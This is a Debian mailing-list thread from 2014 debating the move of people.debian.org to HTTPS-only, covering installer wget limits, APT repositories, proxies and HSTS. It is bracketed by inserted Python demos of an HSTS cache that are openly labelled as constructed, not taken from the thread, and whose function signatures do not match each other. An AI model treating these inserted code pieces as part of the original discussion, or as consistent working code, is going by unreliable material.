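    store.observe_response(host, "https", "max-age=31536000; includeSubDomains", now=t0 + 2)
    fetched.append(store.rewrite(url, now=t0 + 3))
    # 3. Once max-age has elapsed without another https:// visit, the upgrade stops.
    fetched.append(store.rewrite(url, now=t0 + 2 + 31536000 + 1))
    return fetched


if __name__ == "__main__":
    for u in demo():
        print(u)
```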
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 01:19:58PM +0200, Thijs Kinkhorst wrote:
> On Sun, July 20, 2014 08:15, Wouter Verhelst wrote:
> > On Saturday 19 July 2014 22:54:47, you wrote:
> > > > Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated.
> > >
> > > Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks
> >
> > True, but debian-installer simply does not support any signed/encrypted preseeding.
>
> If you insist on using http, you can also just host your preseed files on http://grep.be. I don't see why DSA should wait to implement improvements to Debian services while there are perfect alternatives available to suit your use case.

Because it's not an improvement to the service; it's a change that makes the *service* to Debian developers worse, for political reasons. Telling DDs "you can just host the files on your own server" is missing the point of why people.debian.org exists in the first place.

-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
Ubuntu Developer                                    http://www.debian.org/
slanga...@ubuntu.com                                     vor...@debian.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 09:00:05PM +0200, Peter Palfrader wrote:
>> IMO, a dedicated vhost name sounds much more appealing than magic apache configs.
> I wonder whether it should use the same UserDirs.

Oh, right. With different UserDirs (bonus point: the default one, public_html/, being the one that works https-only) people can simply use symlinks.

--
Stefano Zacchiroli  . . . . . . .  z...@upsilon.cc
Maître de conférences . . . . . http://upsilon.cc/zack
Former Debian Project Leader  . . @zack on identi.ca
« the first rule of tautology club is the first rule of tautology club »
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 12:05:56AM +0200, Stefano Zacchiroli wrote:
> On Sun, Jul 20, 2014 at 09:00:05PM +0200, Peter Palfrader wrote:
>>> IMO, a dedicated vhost name sounds much more appealing than magic apache configs.
>> I wonder whether it should use the same UserDirs.
> Oh, right. With different UserDirs (bonus point: the default one, public_html/, being the one that works https-only) people can simply use symlinks.

I'm in favour of soylent.debian.org since soylent [green] is people. *cough*

--
Luca Filipozzi
http://www.crowdrise.com/SupportDebian

Archive: https://lists.debian.org/20140720222052.ga23...@emyr.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi,

On Sun, Jul 20, 2014 at 07:30:35PM +0100, Colin Watson wrote:
> I'll hopefully get to finishing this at DebConf; I think I merged most of the safe and independent pieces already, and mostly just need to deal with wget-udeb. I'm not expecting to backport this to wheezy though.

yeah, it seems that you merged everything into git already. Yay! It's wget-udeb (relatively easy), but it's also either a new udeb for gnutls or, like in Ubuntu, one for libssl. (You sure know, but for the benefit of the list.)

Kind regards
Philipp Kern
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 13 July 2014 22:13:10, Martin Zobel-Helas wrote:
> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).

Why?

Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated.

Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus "HTTP is obsolete" idea?

--
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26
Re: people.debian.org will move from ravel to paradis and become HTTPS only
]] Wouter Verhelst

> On Sunday 13 July 2014 22:13:10, Martin Zobel-Helas wrote:
>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
> Why?

Because the world is a nastier place than it used to be. It's like the move from telnet to SSH many moons ago, all protocols ought to be encrypted today.

> Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated.

Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks unless you do extra checking against checksums (something d-i doesn't support, AFAIK).

> Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus "HTTP is obsolete" idea?

There are lots of attack vectors. It's not a response to a single attack being exploited in the wild.

--
Tollef Fog Heen
UNIX is user friendly, it's just picky about who its friends are

Archive: https://lists.debian.org/877g39f4rs@xoog.err.no
Re: Re: people.debian.org will move from ravel to paradis and become HTTPS only
2014-07-17 2:20 GMT+02:00 brian m. carlson sand...@crustytoothpaste.net:
> On Wed, Jul 16, 2014 at 11:43:17PM +0100, Steven Chamberlain wrote:
>> Some sites (I mean, deployments) like to use a caching proxy, especially if many machines use the same resource, and/or bandwidth is scarce. Or even just one machine accessing the same resource often. Maybe this won't apply to anything particular on people.d.o, but certainly a lot of websites are breaking this recently by becoming HTTPS-only.
> Unfortunately, many of these proxies are broken. The Squid version in wheezy doesn't support HTTP/1.1, so trying to use chunked encoding or 100 Continue (which is required for certain applications[0]) simply doesn't work. And simply not working is one of the best failure cases for broken proxies. Using HTTPS ensures that the broken proxy problem is gone.
>> I'm curious to know the rationale for shutting down HTTP access, because if it is to generally protect web browsers doing web-based login and using cookies, that would typically be covered by HSTS. And the privacy-conscious may be using the HTTPS Everywhere add-on.
> I can't speak for DSA here, but some of the reasons that I went HTTPS-only are that certificates are relatively cheap, pervasive monitoring is not going away, crypto is so cheap computationally on most platforms that there's no reason not to, and broken proxies suck.

Those are all very good reasons for enabling HTTPS, but none of those serve as a good reason for disabling HTTP. If someone uses a broken proxy he/she can fix it or switch to https, but why are others required to switch? I for one would be unhappy with losing the ability of using a caching proxy for APT repositories hosted on p.d.o; I saved many GBs of bandwidth this way.

I have added debian-admin@l.d.o to CC since according to the email starting this thread this is the address where questions should be sent and apparently this thread did not get any attention of the Admin Team.

Cheers,
Balint

> [0] Git pushes over HTTP with Kerberos, among many others.
>
> --
> brian m. carlson / brian with sandals: Houston, Texas, US
> +1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
> OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187

Archive: https://lists.debian.org/CAK0OdpwRVSFPNBVdN=q2OyF5QNULhV+VuRQNayr0T=dizxw...@mail.gmail.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
2014-07-15 21:39 GMT+02:00 Philipp Kern pk...@debian.org:
> On 2014-07-15 16:00, Thorsten Glaser wrote:
>> Martin Zobel-Helas dixit:
>>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
>> […]
>> Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures).
>> Actually, this will break most DDs' APT repositories because apt-transport-https is usually not installed.
> Pointing machines to a non-mirrored SPoF running on donated project resources was bound to be not such a great idea anyway.

Which place would be better for hosting DDs' APT repositories? I had the impression that p.d.o was the usual place for them and it served quite well. I would also be interested in keeping plain HTTP to not break repositories (including mine :-)).

Somehow Steve's question regarding the rationale behind disabling HTTP got cut out from email responses so let me raise it again: Why is it important to disable HTTP? Could it be kept enabled for APT repositories following some special directory structure like http://p.d.o/~user/ppa/* ?

2014-07-14 0:19 GMT+02:00 Steve Langasek vor...@debian.org:
> Hi Martin,
>
> On Sun, Jul 13, 2014 at 10:13:10PM +0200, Martin Zobel-Helas wrote:
>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
> Could you elaborate on why people.d.o will enforce https? If http connections are still allowed, this doesn't provide any protection from a MITM attack for most users; and the contents of people.d.o are not generally security sensitive. Is this part of a broader effort by DSA to increase use of https by default as a deterrent to large-scale traffic sniffing?

Cheers,
Balint

Archive: https://lists.debian.org/cak0odpymbo7gmge3khx08wtfu3bqz+just3tzvnj58ztq0a...@mail.gmail.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Wed, 2014-07-16 at 19:50 +0200, Bálint Réczey wrote:
> 2014-07-15 21:39 GMT+02:00 Philipp Kern pk...@debian.org:
>> On 2014-07-15 16:00, Thorsten Glaser wrote:
>>> Martin Zobel-Helas dixit:
>>>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
>>> […]
>>> Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures).
>>> Actually, this will break most DDs' APT repositories because apt-transport-https is usually not installed.
>> Pointing machines to a non-mirrored SPoF running on donated project resources was bound to be not such a great idea anyway.
> Which place would be better for hosting DDs' APT repositories? I had the impression that p.d.o was the usual place for them and it served quite well. I would also be interested in keeping plain HTTP to not break repositories (including mine :-)).

I would have thought it was possible to configure this redirection to be conditional on the User-Agent string. But also, perhaps apt should start recommending apt-transport-https.

Ben.

--
Ben Hutchings
Hoare's Law of Large Problems: Inside every large problem is a small problem struggling to get out.
Re: Re: people.debian.org will move from ravel to paradis and become HTTPS only
Some sites (I mean, deployments) like to use a caching proxy, especially if many machines use the same resource, and/or bandwidth is scarce. Or even just one machine accessing the same resource often. Maybe this won't apply to anything particular on people.d.o, but certainly a lot of websites are breaking this recently by becoming HTTPS-only.

In the case of people.d.o I guess most issues will arise from clients not having HTTPS support at all, or not being willing/able to follow a redirect.

I'm curious to know the rationale for shutting down HTTP access, because if it is to generally protect web browsers doing web-based login and using cookies, that would typically be covered by HSTS. And the privacy-conscious may be using the HTTPS Everywhere add-on.

Regards,
--
Steven Chamberlain
ste...@pyro.eu.org

Archive: https://lists.debian.org/53c70005.5020...@pyro.eu.org
Re: Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Wed, Jul 16, 2014 at 11:43:17PM +0100, Steven Chamberlain wrote:
> Some sites (I mean, deployments) like to use a caching proxy, especially if many machines use the same resource, and/or bandwidth is scarce. Or even just one machine accessing the same resource often. Maybe this won't apply to anything particular on people.d.o, but certainly a lot of websites are breaking this recently by becoming HTTPS-only.

Unfortunately, many of these proxies are broken. The Squid version in wheezy doesn't support HTTP/1.1, so trying to use chunked encoding or 100 Continue (which is required for certain applications[0]) simply doesn't work. And simply not working is one of the best failure cases for broken proxies. Using HTTPS ensures that the broken proxy problem is gone.

> I'm curious to know the rationale for shutting down HTTP access, because if it is to generally protect web browsers doing web-based login and using cookies, that would typically be covered by HSTS. And the privacy-conscious may be using the HTTPS Everywhere add-on.

I can't speak for DSA here, but some of the reasons that I went HTTPS-only are that certificates are relatively cheap, pervasive monitoring is not going away, crypto is so cheap computationally on most platforms that there's no reason not to, and broken proxies suck.

[0] Git pushes over HTTP with Kerberos, among many others.

--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Dixi quod…

> Martin Zobel-Helas dixit:
>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
> […]
> Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures).

Actually, this will break most DDs' APT repositories because apt-transport-https is usually not installed.

bye,
//mirabilos
--
diogenese: Beware of ritual lest you forget the meaning behind it.
igli: yeah but it means if you really care about something, don't ritualise it, or you will lose it. don't fetishise it, don't obsess. or you'll forget why you love it in the first place.

Archive: https://lists.debian.org/pine.bsm.4.64l.1407151359300.24...@herc.mirbsd.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 2014-07-15 16:00, Thorsten Glaser wrote:
> Martin Zobel-Helas dixit:
>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
> […]
> Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures).
> Actually, this will break most DDs' APT repositories because apt-transport-https is usually not installed.

Pointing machines to a non-mirrored SPoF running on donated project resources was bound to be not such a great idea anyway.

Kind regards
Philipp Kern

Archive: https://lists.debian.org/6af903cfa2279e9dd3dc1d935b2cb...@hub.kern.lc
m68k too slow for https? Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi,

On Sunday, 13 July 2014, Thorsten Glaser wrote:
>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
> This means that requests from wget (since it switched from OpenSSL to GnuTLS) and other utilities from slow architectures (such as m68k or avr32) to people.d.o will timeout.

am I getting this right, that there are architectures which are too slow to use https??? if so: wow...

(And, if that's the case, I don't think we should care about those then... Debian doesn't run on a 6502 either ;)

cheers,
Holger
Re: m68k too slow for https? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 14, 2014 at 11:16:01AM +0200, Holger Levsen wrote:
> am I getting this right, that there are architectures which are too slow to use https??? if so: wow...

This seems likely, especially for embedded platforms where power is a massive constraint.

> (And, if that's the case, I don't think we should care about those then... Debian doesn't run on a 6502 either ;)

If Debian stops supporting embedded platforms, it stops being a universal operating system.

I think HTTPS is a good thing, but could we not also have a VHOST named something like insecure.people.d.o that continued to allow access via plain HTTP?

It is also possible (not sure about this) that there are countries where encryption is not permitted and so this would exclude anyone in those countries from accessing people.d.o's content. We have provisions in place (iirc) for accepting packages from people in such countries, we should also have provisions in place for allowing people in such countries to access people.d.o.

Iain.

--
e: i...@fsfe.org   w: iain.learmonth.me
x: i...@jabber.fsfe.org   t: +447875886930
c: MM6MVQ   g: IO87we
p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49
Re: m68k too slow for https? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 14, 2014 at 10:36:10AM +0100, Iain R. Learmonth wrote:
> If Debian stops supporting embedded platforms, it stops being a universal operating system.

FSVO universal. I think this is not a good argument unless/until we have some more-or-less common and official agreement about what "universal" means for us.

--
WBR, wRAR

Archive: https://lists.debian.org/20140714094817.ga28...@belkar.wrar.name
Re: m68k too slow for https? Re: people.debian.org will move from ravel to paradis and become HTTPS only
h01ger wrote:
> On Sunday, 13 July 2014, Thorsten Glaser wrote:
>>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
>> This means that requests from wget (since it switched from OpenSSL to GnuTLS) and other utilities from slow architectures (such as m68k or avr32) to people.d.o will timeout.
> am I getting this right, that there are architectures which are too slow to use https??? if so: wow...

No, this is only with some implementations. What differs, I do not know… maybe offered algorithms, or use of thread-local storage (which has syscall penalty on arches without a spare register, such as x86's GS segment register, to use). When wget was switched from OpenSSL to GnuTLS (which I still consider a huge mistake) it no longer worked with most servers. (I have not checked whether this is still the case; I think there was a change in src:gnutls26 partially mitigating it later, and I didn't look at src:gnutls28 at all yet.)

But then: yes, some systems are too slow for SSL with some other systems… for example, my home server (x86) does not connect with servers using 5120R or larger keys, 4096R is fine though (even with m68k).

bye,
//mirabilos

Archive: https://lists.debian.org/lq0ddd$fjm$1...@ger.gmane.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Martin Zobel-Helas dixit:
> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).

This means that requests from wget (since it switched from OpenSSL to GnuTLS) and other utilities from slow architectures (such as m68k or avr32) to people.d.o will timeout.

Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures).

bye,
//mirabilos
--
“ah that reminds me, thanks for the stellar entertainment that you and certain other people provide on the Debian mailing lists │ sole reason I subscribed to them (I'm not using Debian anywhere) is the entertainment factor │ Debian does not strike me as a place for good humour, much less German admin-style humour”

Archive: https://lists.debian.org/pine.bsm.4.64l.1407132021060.32...@herc.mirbsd.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Martin Zobel-Helas zo...@debian.org, 2014-07-13, 22:13:
> The plan is to execute a final sync of home directories on 2014-JUL-26 starting at 0800Z.

http://xkcd.com/1179/

> we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).

This is great news. Thanks! :-)

--
Jakub Wilk

Archive: https://lists.debian.org/20140713203139.ga9...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi Martin,

On Sun, Jul 13, 2014 at 10:13:10PM +0200, Martin Zobel-Helas wrote:
> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).

Could you elaborate on why people.d.o will enforce https? If http connections are still allowed, this doesn't provide any protection from a MITM attack for most users; and the contents of people.d.o are not generally security sensitive. Is this part of a broader effort by DSA to increase use of https by default as a deterrent to large-scale traffic sniffing?

Cheers,
--
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
Ubuntu Developer                                    http://www.debian.org/
slanga...@ubuntu.com                                     vor...@debian.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 2014-07-13 at 15:19:22 -0700, Steve Langasek wrote:
> On Sun, Jul 13, 2014 at 10:13:10PM +0200, Martin Zobel-Helas wrote:
>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
> […]
> If http connections are still allowed, this doesn't provide any protection from a MITM attack for most users; and the contents of people.d.o are not generally security sensitive.

HSTS protects mostly from MITM (except for first connection), but I'm not sure if DSA is planning to add it.

Thanks,
Guillem

Archive: https://lists.debian.org/20140713230911.ga30...@gaara.hadrons.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 14, 2014 at 7:09 AM, Guillem Jover wrote:
> HSTS protects mostly from MITM (except for first connection), but I'm not sure if DSA is planning to add it.

HSTS is a standard part of HTTPS setup on machines run by DSA, so it is very likely they will.

--
bye,
pabs

https://wiki.debian.org/PaulWise

Archive: https://lists.debian.org/caktje6fi2q4x1lmqvdw7nphr0tbuxprswjhfgrqi9tgqzn5...@mail.gmail.com
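The HSTS behaviour argued over in this subthread (no protection on the first connection, an automatic http-to-https rewrite only while the cached max-age lasts, and nothing left once the client's cache is cleared) modelled as a small added example; this is not code from the thread, from DSA or from any browser, and the host names, header values and clock values are constructed.

```python
# Added illustration of the browser-side HSTS cache (RFC 6797 semantics); not code
# from this thread, from Debian or from any browser. Hosts, headers, clock: constructed.
from urllib.parse import urlsplit, urlunsplit

def parse_hsts_header(value):
    """Strict-Transport-Security value -> (max_age, include_subdomains), or None if invalid."""
    max_age, include_sub = None, False
    for token in value.split(";"):
        name, _, val = token.strip().partition("=")
        name, val = name.strip().lower(), val.strip().strip('"')
        if name == "max-age":
            if not val.isdigit():
                return None          # browsers ignore a malformed max-age
            max_age = int(val)
        elif name == "includesubdomains":
            include_sub = True
    return None if max_age is None else (max_age, include_sub)

class HstsCache:
    """Per-host policies a browser keeps between visits: host -> (expires, include_sub)."""
    def __init__(self):
        self._policies = {}

    def observe_response(self, url, headers, now):
        """Store the policy carried by a response; honoured only if it arrived over HTTPS."""
        parts = urlsplit(url)
        value = headers.get("Strict-Transport-Security")
        if parts.scheme != "https" or value is None:
            return False             # an HSTS header seen over plain HTTP carries no weight
        parsed = parse_hsts_header(value)
        if parsed is None:
            return False
        max_age, include_sub = parsed
        host = parts.hostname.lower()
        self._policies.pop(host, None)
        if max_age:                  # max-age=0 tells the client to forget the host
            self._policies[host] = (now + max_age, include_sub)
        return True

    def is_known_host(self, host, now):
        """True if host, or a parent domain with includeSubDomains, has an unexpired policy."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            policy = self._policies.get(candidate)
            if policy is None:
                continue
            if policy[0] <= now:
                del self._policies[candidate]    # expired: as if the host was never visited
            elif i == 0 or policy[1]:
                return True
        return False

    def rewrite(self, url, now):
        """The URL the browser really fetches: upgraded to https for a known host."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_known_host(parts.hostname, now):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url

    def clear(self):
        """What 'clearing out the entire cache' does: every policy is forgotten."""
        self._policies.clear()


def walkthrough():
    """The sequence debated above, on a constructed clock counting seconds."""
    cache = HstsCache()
    plain = "http://people.debian.org/~user/index.html"
    secure = "https://people.debian.org/~user/index.html"
    hdrs = {"Strict-Transport-Security": "max-age=15552000; includeSubDomains"}
    out = {"first": cache.rewrite(plain, now=0)}        # first contact: not protected
    cache.observe_response(secure, hdrs, now=0)          # one HTTPS visit installs the policy
    out["second"] = cache.rewrite(plain, now=100)        # upgraded before any bytes leave
    out["expired"] = cache.rewrite(plain, now=15552000)  # max-age elapsed: back to square one
    cache.observe_response(secure, hdrs, now=15552000)
    cache.clear()                                        # "clear out the entire cache"
    out["cleared"] = cache.rewrite(plain, now=15552001)
    return out
```

Clients without such a cache (wget in stable d-i, apt without apt-transport-https) never see the upgrade at all, which is why the server-side redirect, not HSTS, is what those clients trip over.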